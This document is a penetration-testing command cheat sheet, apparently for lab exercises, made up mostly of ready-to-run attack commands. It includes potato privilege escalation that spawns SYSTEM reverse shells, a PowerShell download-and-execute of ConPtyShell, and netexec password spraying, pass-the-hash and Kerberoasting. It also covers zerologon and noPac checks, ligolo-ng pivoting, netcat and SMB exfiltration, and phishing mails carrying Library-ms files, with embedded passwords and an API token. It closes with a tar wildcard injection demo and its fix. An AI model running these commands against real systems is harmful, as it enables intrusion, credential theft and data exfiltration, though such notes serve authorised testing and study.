Command_Lookup
xfreerdp3 (the ! in /auth-pkg-list excludes Kerberos from the auth packages; the backslash only stops bash history expansion)
xfreerdp3 /u:"emma" /p:'SomersetVinyl1!' /d:dmz.relia.com /v:192.168.244.248 /auth-pkg-list:\!kerberos
SigmaPotato (needs SeImpersonatePrivilege; spawns a SYSTEM reverse shell)
./SigmaPotato.exe --revshell 192.168.45.166 444
GodPotato (needs SeImpersonatePrivilege; runs the given command as SYSTEM)
.\gp4.exe -cmd "cmd /c \tools\nc.exe 192.168.45.153 2401 -e cmd"
PDF metadata (author, creator tool, timestamps; -G1 shows which tag group each value comes from)
exiftool -a -G1 WelcomeLetter.pdf
NXC (netexec)
Local (non-domain) account authentication, e.g. the local Administrator
netexec smb target -u username -p password --local-auth
SMB null-session share listing
netexec smb target -u '' -p '' --shares
SSH password check (keep spraying after the first valid login)
netexec ssh target -u username -p password --continue-on-success
SMB pass-the-hash (NT hash only, no LM part)
netexec smb $TARGETS -u $USERNAME -H 'NTHASH'
Roasting (needs any valid domain account; hashes are written to the named file)
netexec ldap target -u username -p password --kerberoasting hash.txt
netexec ldap target -u username -p password --asreproast hash.txt
BloodHound collection (point --dns-server at the DC when Kali does not use it for DNS)
netexec ldap target -u username -p password --bloodhound --dns-server ip --dns-tcp -c all
ftp
netexec ftp target -u username -p password --ls
Vulnerability scanning (run these modules against a domain controller)
netexec smb target -u username -p password -M zerologon
netexec smb target -u username -p password -M petitpotam
netexec smb target -u username -p password -M nopac
MSSQL Scanning
netexec mssql target -u username -p password
Upgrade a reverse shell to an interactive TTY (then Ctrl-Z, put the local terminal in raw mode with stty as in the Kali line below, and fg)
python3 -c 'import pty; pty.spawn("/bin/bash")'
ConPtyShell, Windows side (fully interactive PowerShell; the script is fetched from the Kali web server)
IEX(IWR http://192.168.45.153:8001/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 192.168.45.153 3001
Kali side (run before the connection arrives; stty size passes the terminal dimensions)
stty raw -echo; (stty size; cat) | nc -lvnp 3001
Shell upgrade through running a service as SYSTEM (sc.exe services run as LocalSystem unless an account is given, so httpd and anything it spawns inherit SYSTEM; the space after binPath= is mandatory)
sc create MyApacheService binPath= "C:\wamp64\bin\apache\apache2.4.51\bin\httpd.exe -k runservice"
sc start MyApacheService
sc query MyApacheService
ligolo-ng
Initial setup: create the TUN interface on Kali (cy21 is the local user who will own it)
sudo ip tuntap add user cy21 mode tun ligolo
Activate the Interface
sudo ip link set ligolo up
Proxy server commands (Kali)
Start the Ligolo proxy (self-signed certificate, listening on 443 for agents)
ligolo-proxy -selfcert -laddr 0.0.0.0:443
Start the tunnel for the selected session on an alternate interface (typed in the ligolo-ng proxy console)
start --tun ligolo2
Add a listener (proxy console): the agent listens on 0.0.0.0:2380 and forwards every connection to 127.0.0.1:2380 on Kali, so hosts behind the pivot can reach Kali listeners
listener_add --addr 0.0.0.0:2380 --to 127.0.0.1:2380
Add a route to the internal network through the tunnel (Kali shell)
sudo ip route add 172.16.113.0/24 dev ligolo
Add a route for services bound to the agent's own localhost (ligolo-ng maps 240.0.0.1 to 127.0.0.1 on the agent)
sudo ip route add 240.0.0.1/32 dev ligolo
Agent commands (on the pivot host; -ignore-cert is required because the proxy uses -selfcert)
.\agent.exe -connect 192.168.45.229:443 -v -ignore-cert
Exfiltration
SMB: map the attacker's share as drive n: (the password follows the username)
net use n: \\192.168.45.212\smb /user:test test
Copy a file to the attacker host
copy test.zip \\192.168.45.212\smb\
Netcat: receive on Kali (listening port and output file)
nc -lp 2380 > backup.log
Send from the target (IP and port must match the listener; nc exits when stdin is exhausted)
nc 192.168.1.10 1234 < file_to_send.txt
Mail sending
Using swaks (-ap prompts for the SMTP auth password; --suppress-data keeps the message body out of the transcript)
sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.214.242 --header "Subject: Staging Script" --suppress-data -ap
Using sendemail (-xp is the SMTP auth password, -u the subject, -m the body, -a the attachment)
sendemail -f 'maildmz@relia.com' \
-t 'jim@relia.com' \
-s 192.168.224.189:25 \
-u 'a spreadsheet' \
-m 'Please check this spreadsheet' \
-a config.Library-ms \
-xp DPuBT9tGCBrTbR
WPscan (plugin enumeration; an API token is needed for vulnerability data)
wpscan --url http://192.168.205.244/ --api-token 2XMK36zxVS92XbMGbXWdFam0398eeV1FaNufGvsKVeQ --enumerate p --plugins-detection aggressive
Smbclient interaction
Enter each line at the smb: \> prompt to download the whole share recursively (the same sequence can be passed non-interactively with -c)
mask ""
recurse ON
prompt OFF
mget *
Miscellaneous
Tar wildcard injection, command execution when a privileged job runs tar with an unquoted * (filenames are parsed as options): https://medium.com/@althubianymalek/linux-privilege-escalation-using-tar-wildcards-a-step-by-step-guide-55771aae063f
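Worked example of the tar wildcard technique linked above, added here and not taken from the original page or the linked write-up. It assumes GNU tar (the --checkpoint options are GNU extensions); the directory, the data file, the payload script shell.sh and the marker file pwned are all constructed for the demonstration. The vulnerable function reproduces the pattern a root cron job typically has, and the hardened function shows the fix: prefixing the glob with ./ so no expanded name can start with a dash.

```shell
#!/bin/sh
# Added example (not from the original page). Assumes GNU tar.
# Everything below (paths, payload, marker file) is constructed for the demo.

# Build a directory shaped like the one a privileged job archives with
# "tar cf backup.tar *": a normal file, the payload script, and two files
# whose NAMES are GNU tar options. Prints the directory path.
setup_dir() {
    work=$(mktemp -d)
    # Payload: in a real attack this would copy a SUID shell or add a cron
    # entry; here it only drops a marker file so the result can be checked.
    printf '#!/bin/sh\ntouch "%s/pwned"\n' "$work" > "$work/shell.sh"
    touch "$work/data.txt"
    # Crafted names: once the shell expands *, these arrive at tar as
    # arguments and its option parser treats them as options, not files.
    touch -- "$work/--checkpoint=1"
    touch -- "$work/--checkpoint-action=exec=sh shell.sh"
    echo "$work"
}

# Vulnerable pattern: unquoted wildcard. tar runs "sh shell.sh" at the
# first checkpoint, in its working directory. Prints the marker path when
# the payload ran, nothing otherwise.
tar_wildcard_vulnerable() {
    d=$(setup_dir)
    ( cd "$d" && tar cf backup.tar * 2>/dev/null )
    [ -f "$d/pwned" ] && echo "$d/pwned"
    rm -rf "$d"
}

# Hardened pattern: every expanded argument starts with "./", so tar sees
# "./--checkpoint=1" as a plain file name. Ending option parsing with "--"
# before the glob achieves the same. Prints nothing when the fix holds.
tar_wildcard_hardened() {
    d=$(setup_dir)
    ( cd "$d" && tar cf backup.tar ./* 2>/dev/null )
    [ -f "$d/pwned" ] && echo "$d/pwned"
    rm -rf "$d"
}

tar_wildcard_vulnerable   # prints the marker path: the payload executed
tar_wildcard_hardened     # prints nothing: the crafted names were archived as files
```

The detection-side takeaway is the same on a real system: look for files whose names begin with "--checkpoint" in directories that privileged backup or cleanup jobs archive, and audit cron and systemd timers for tar invocations with a bare wildcard.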